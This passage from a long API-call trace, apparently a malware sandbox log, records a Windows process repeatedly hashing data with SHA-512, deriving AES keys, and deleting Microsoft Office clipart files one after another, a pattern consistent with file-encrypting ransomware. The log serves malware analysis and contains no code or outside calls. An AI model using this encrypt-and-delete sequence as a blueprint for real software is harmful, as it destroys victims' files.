hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad478) returned 1 [0195.422] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.422] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.422] wcslen (_String="\\\\?\\") returned 0x4 [0195.500] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 1 [0195.500] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01138_.wmf")) returned 1 [0195.501] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0195.501] wcslen (_String="OK") returned 0x2 [0195.501] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.501] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.501] CryptDestroyKey (hKey=0x9ad478) returned 1 [0195.501] CryptDestroyHash (hHash=0x9ad138) returned 1 [0195.501] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0195.507] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0195.507] CryptHashData (hHash=0x9ad538, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.507] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad538, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad738) returned 1 [0195.508] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.508] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.508] wcslen (_String="\\\\?\\") returned 0x4 [0195.582] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 1 [0195.582] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01139_.wmf")) returned 1 [0195.583] CryptDestroyKey (hKey=0x9ad378) returned 1 [0195.583] wcslen (_String="OK") returned 0x2 [0195.583] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.583] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.583] CryptDestroyKey (hKey=0x9ad738) returned 1 [0195.583] CryptDestroyHash (hHash=0x9ad538) returned 1 [0195.583] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0195.585] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0195.585] CryptHashData (hHash=0x9ad278, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.585] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad838) returned 1 [0195.585] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.586] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.586] wcslen (_String="\\\\?\\") returned 0x4 [0195.598] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 1 [0195.598] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf")) returned 1 [0195.601] CryptDestroyKey (hKey=0x9ad438) returned 1 [0195.601] wcslen (_String="OK") returned 0x2 [0195.601] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.601] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.601] CryptDestroyKey (hKey=0x9ad838) returned 1 [0195.601] CryptDestroyHash (hHash=0x9ad278) returned 1 [0195.601] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0195.605] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0195.605] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.605] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad478) returned 1 [0195.605] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.605] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.605] wcslen (_String="\\\\?\\") returned 0x4 [0195.638] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 1 [0195.638] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf")) returned 1 [0195.641] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0195.641] wcslen (_String="OK") returned 0x2 [0195.641] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.641] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.641] CryptDestroyKey (hKey=0x9ad478) returned 1 [0195.641] CryptDestroyHash (hHash=0x9ad138) returned 1 [0195.641] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0195.644] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0195.644] CryptHashData (hHash=0x9ad878, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.644] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad378) returned 1 [0195.644] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.644] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.644] wcslen (_String="\\\\?\\") returned 0x4 [0195.647] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 1 [0195.647] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf")) returned 1 [0195.648] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0195.648] wcslen (_String="OK") returned 0x2 [0195.648] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.648] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.648] CryptDestroyKey (hKey=0x9ad378) returned 1 [0195.648] CryptDestroyHash (hHash=0x9ad878) returned 1 [0195.648] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0195.652] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444944 | out: phHash=0x1d444944) returned 1 [0195.652] CryptHashData (hHash=0x9ad578, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.652] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d444948 | out: phKey=0x1d444948*=0x9ad378) returned 1 [0195.653] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.653] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.653] wcslen (_String="\\\\?\\") returned 0x4 [0195.656] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 1 [0195.656] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf")) returned 1 [0195.657] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0195.657] wcslen (_String="OK") returned 0x2 [0195.657] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.657] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.657] CryptDestroyKey (hKey=0x9ad378) returned 1 [0195.657] CryptDestroyHash (hHash=0x9ad578) returned 1 [0195.657] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0195.660] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0195.660] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.660] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad5f8) returned 1 [0195.660] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.660] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.660] wcslen (_String="\\\\?\\") returned 0x4 [0195.695] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF") returned 1 [0195.695] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01151_.wmf")) returned 1 [0195.696] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0195.696] wcslen (_String="OK") returned 0x2 [0195.696] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.696] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.696] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0195.696] CryptDestroyHash (hHash=0x9ad338) returned 1 [0195.696] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0195.704] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0195.704] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.704] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad878) returned 1 [0195.704] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.704] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.704] wcslen (_String="\\\\?\\") returned 0x4 [0195.749] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 1 [0195.749] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf")) returned 1 [0195.750] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0195.750] wcslen (_String="OK") returned 0x2 [0195.750] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.750] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.750] CryptDestroyKey (hKey=0x9ad878) returned 1 [0195.750] CryptDestroyHash (hHash=0x9ad838) returned 1 [0195.750] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0195.753] CryptCreateHash (in: hProv=0x8e36e8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0195.753] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.753] CryptDeriveKey (in: hProv=0x8e36e8, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad8b8) returned 1 [0195.753] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.753] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.753] wcslen (_String="\\\\?\\") returned 0x4 [0195.757] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF") returned 1 [0195.758] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf")) returned 1 [0195.759] CryptDestroyKey (hKey=0x9ad478) returned 1 [0195.759] wcslen (_String="OK") returned 0x2 [0195.759] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.759] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.759] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0195.759] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0195.759] CryptReleaseContext (hProv=0x8e36e8, dwFlags=0x0) returned 1 [0195.761] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0195.761] CryptHashData (hHash=0x9ad638, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.761] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad638, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad2b8) returned 1 [0195.761] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.761] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.761] wcslen (_String="\\\\?\\") returned 0x4 [0195.784] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 1 [0195.784] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01160_.wmf")) returned 1 [0195.785] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0195.785] wcslen (_String="OK") returned 0x2 [0195.785] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.785] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.785] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0195.785] CryptDestroyHash (hHash=0x9ad638) returned 1 [0195.785] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0195.787] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0195.787] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.787] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad2b8) returned 1 [0195.787] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.787] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.787] wcslen (_String="\\\\?\\") returned 0x4 [0195.799] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 1 [0195.799] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf")) returned 1 [0195.801] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0195.801] wcslen (_String="OK") returned 0x2 [0195.801] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.801] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.801] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0195.801] CryptDestroyHash (hHash=0x9ad438) returned 1 [0195.801] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0195.803] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0195.803] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.803] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad4f8) returned 1 [0195.803] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.803] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.803] wcslen (_String="\\\\?\\") returned 0x4 [0195.810] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 1 [0195.810] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf")) returned 1 [0195.811] CryptDestroyKey (hKey=0x9ad838) returned 1 [0195.811] wcslen (_String="OK") returned 0x2 [0195.811] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.811] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.811] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0195.811] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0195.811] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0195.813] CryptCreateHash (in: hProv=0x8e3880, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0195.813] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.814] CryptDeriveKey (in: hProv=0x8e3880, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad438) returned 1 [0195.814] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.814] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.814] wcslen (_String="\\\\?\\") returned 0x4 [0195.825] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 1 [0195.825] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01166_.wmf")) returned 1 [0195.826] CryptDestroyKey (hKey=0x9ad478) returned 1 [0195.826] wcslen (_String="OK") returned 0x2 [0195.826] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.826] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.826] CryptDestroyKey (hKey=0x9ad438) returned 1 [0195.826] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0195.826] CryptReleaseContext (hProv=0x8e3880, dwFlags=0x0) returned 1 [0195.828] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0195.829] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.829] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad7f8) returned 1 [0195.829] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.829] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.829] wcslen (_String="\\\\?\\") returned 0x4 [0195.958] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 1 [0195.958] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01167_.wmf")) returned 1 [0195.959] CryptDestroyKey (hKey=0x9ad338) returned 1 [0195.959] wcslen (_String="OK") returned 0x2 [0195.959] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.959] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.959] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0195.959] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0195.959] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0195.961] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0195.961] CryptHashData (hHash=0x9ad6b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.962] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad6b8, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad1f8) returned 1 [0195.962] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.962] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.962] wcslen (_String="\\\\?\\") returned 0x4 [0195.981] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 1 [0195.981] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01168_.wmf")) returned 1 [0195.982] CryptDestroyKey (hKey=0x9ad238) returned 1 [0195.982] wcslen (_String="OK") returned 0x2 [0195.982] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.982] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0195.982] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0195.982] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0195.982] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0195.985] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0195.985] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0195.985] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad6b8) returned 1 [0195.985] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0195.985] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0195.985] wcslen (_String="\\\\?\\") returned 0x4 [0196.008] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 1 [0196.008] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01169_.wmf")) returned 1 [0196.009] CryptDestroyKey (hKey=0x9ad878) returned 1 [0196.009] wcslen (_String="OK") returned 0x2 [0196.009] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.009] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.009] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0196.009] CryptDestroyHash (hHash=0x9ad738) returned 1 [0196.009] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0196.012] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0196.012] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.012] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad438) returned 1 [0196.012] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0196.012] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0196.012] wcslen (_String="\\\\?\\") returned 0x4 [0196.018] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 1 [0196.019] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01170_.wmf")) returned 1 [0196.020] CryptDestroyKey (hKey=0x9ad338) returned 1 [0196.020] wcslen (_String="OK") returned 0x2 [0196.020] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.020] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0196.020] CryptDestroyKey (hKey=0x9ad438) returned 1 [0196.020] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0196.020] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0196.022] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0196.022] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.022] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad7f8) returned 1 [0196.022] CryptSetKeyParam 